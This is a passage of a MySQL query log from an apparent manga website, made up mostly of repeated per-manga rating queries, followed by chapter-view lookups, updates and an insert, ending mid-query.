Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651793 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330651793 Quit 330651794 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651794 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330651794 Quit 330651795 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651795 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330651795 Quit 330651796 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651796 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330651796 Quit 330651797 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651797 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330651797 Quit 330651798 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651798 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330651798 Quit 330651799 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651799 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330651799 Quit 330651800 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651800 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330651800 Quit 330651801 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651801 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330651801 Quit 330651802 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651802 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330651802 Quit 330651803 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651803 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330651803 Quit 330651804 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651804 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330651804 Quit 330651805 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651805 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330651805 Quit 330651806 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651806 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330651806 Quit 330651807 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651807 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330651807 Quit 330651808 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651808 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330651808 Quit 330651809 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651809 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330651809 Quit 330651810 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651810 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330651810 Quit 330651811 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651811 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330651811 Quit 330651812 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651812 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330651812 Quit 330651813 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651813 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330651813 Quit 330651814 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651814 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330651814 Quit 330651815 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651815 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330651815 Quit 330651816 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651816 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330651816 Quit 330651817 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651817 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330651817 Quit 330651818 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651818 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330651818 Quit 330651819 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651819 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330651819 Quit 330651820 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651820 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330651820 Quit 330651821 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651821 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330651821 Quit 330651822 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651822 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330651822 Quit 330651823 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651823 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330651823 Quit 330651824 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651824 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330651824 Quit 330651825 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651825 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330651825 Quit 330651826 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651826 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330651826 Quit 330651827 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651827 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330651827 Quit 330651828 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651828 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330651828 Quit 330651829 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651829 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330651829 Quit 330651830 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651830 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330651830 Quit 330651831 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651831 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330651831 Quit 330651832 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651832 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330651832 Quit 330651833 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651833 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330651833 Quit 330651834 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651834 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330651834 Quit 330651835 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651835 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330651835 Quit 330651836 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651836 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330651836 Quit 330651837 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651837 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330651837 Quit 330651838 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651838 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330651838 Quit 330651839 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651839 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330651839 Quit 330651840 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651840 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330651840 Quit 330651841 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651841 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330651841 Quit 330651842 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651842 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330651842 Quit 330651843 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651843 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330651843 Quit 330651844 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651844 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330651844 Quit 330651845 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651845 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330651845 Quit 330651846 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651846 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330651846 Quit 330651847 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651847 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330651847 Quit 330651848 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651848 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330651848 Quit 330651849 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651849 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330651849 Quit 330651850 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651850 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330651850 Quit 330651851 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651851 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330651851 Quit 330651852 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651852 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330651852 Quit 330651853 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651853 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330651853 Quit 330651854 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651854 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330651854 Quit 330651855 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651855 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330651855 Quit 330651856 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651856 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330651856 Quit 330651857 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651857 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330651857 Quit 330651858 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651858 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330651858 Quit 330651859 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651859 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330651859 Quit 330651860 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651860 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330651860 Quit 330651861 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651861 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330651861 Quit 330651862 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651862 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330651862 Quit 330651863 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651863 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330651863 Quit 330651864 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651864 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330651864 Quit 330651865 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651865 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330651865 Quit 330651866 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651866 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330651866 Quit 330651867 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651867 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330651867 Quit 330651868 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651868 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330651868 Quit 330651869 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651869 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330651869 Quit 330651870 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651870 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330651870 Quit 330651871 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651871 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330651871 Quit 330651872 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651872 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330651872 Quit 330651873 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651873 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330651873 Quit 330651874 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651874 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330651874 Quit 330651875 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651875 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330651875 Quit 330651876 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651876 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330651876 Quit 330651877 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651877 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330651877 Quit 330651878 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651878 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330651878 Quit 330651879 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651879 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330651879 Quit 330651880 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651880 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330651880 Quit 330651881 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651881 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330651881 Quit 330651882 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651882 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330651882 Quit 330651883 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651883 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330651883 Quit 330651884 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651884 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330651884 Quit 330651885 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651885 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330651885 Quit 330651886 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651886 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330651886 Quit 330651887 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651887 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330651887 Quit 330651888 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651888 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330651888 Quit 330651889 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651889 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330651889 Quit 330651890 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651890 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330651890 Quit 330651891 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651891 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330651891 Quit 330651892 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651892 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330651892 Quit 330651893 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651893 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330651893 Quit 330651894 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651894 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330651894 Quit 330651895 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651895 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330651895 Quit 330651896 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651896 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330651896 Quit 330651897 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651897 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330651897 Quit 330651898 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651898 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330651898 Quit 330651899 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651899 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330651899 Quit 330651900 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651900 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330651900 Quit 330651901 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651901 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330651901 Quit 330651902 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651902 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330651902 Quit 330651903 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651903 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330651903 Quit 330651904 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651904 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330651904 Quit 330651905 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651905 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330651905 Quit 330651906 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651906 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330651906 Quit 330651907 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651907 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330651907 Quit 330651908 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651908 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330651908 Quit 330651909 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651909 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330651909 Quit 330651910 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651910 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330651910 Quit 330651911 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651911 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330651911 Quit 330651912 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651912 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330651912 Quit 330651913 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651913 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330651913 Quit 330651914 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651914 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330651914 Quit 330651915 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651915 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330651915 Quit 330651916 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651916 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330651916 Quit 330651917 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651917 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330651917 Quit 330651918 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651918 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330651918 Quit 330651919 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651919 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330651919 Quit 330651920 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651920 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330651920 Quit 330651921 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651921 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330651921 Quit 330651922 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651922 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330651922 Quit 330651923 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651923 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330651923 Quit 330651924 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651924 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330651924 Quit 330651925 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651925 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330651925 Quit 330651926 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651926 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330651926 Quit 330651927 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651927 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330651927 Quit 330651928 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651928 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330651928 Quit 330651929 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651929 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330651929 Quit 330651930 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651930 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330651930 Quit 330651931 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651931 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330651931 Quit 330651932 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651932 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330651932 Quit 330651933 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651933 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330651933 Quit 330651934 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651934 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330651934 Quit 330651935 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651935 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330651935 Quit 330651936 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651936 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330651936 Quit 330651937 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651937 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330651937 Quit 260225 19:29:13 330651938 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651939 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651938 Quit 330651939 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '6090' and m.active = 1 330651939 Quit 330651940 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651940 Query select * FROM chapters where id = '6090' 330651940 Quit 330651941 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651941 Query select * FROM chapters where manga_id = '158' order by display_priority ASC, id desc 330651941 Quit 330651942 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651942 Query Update chapters set view=view+1 where id = '6090' 330651942 Quit 330651943 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651943 Query select * FROM chapters where id = '6090' 330651944 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651944 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '6090' and m.active = 1 330651943 Quit 330651944 Quit 330651945 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651945 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('158', '6090', '192.12.147.71', 'mangaberri.com', '2026-02-26 03:29:13', '2026-02-26 03:29:13') 330651945 Quit 330651946 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651946 Query select * FROM chapter_images where chapter_id = '6090' 330651946 Quit 330651947 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651947 Query select m.*, sum(c.view) as chapter_view from mangas as 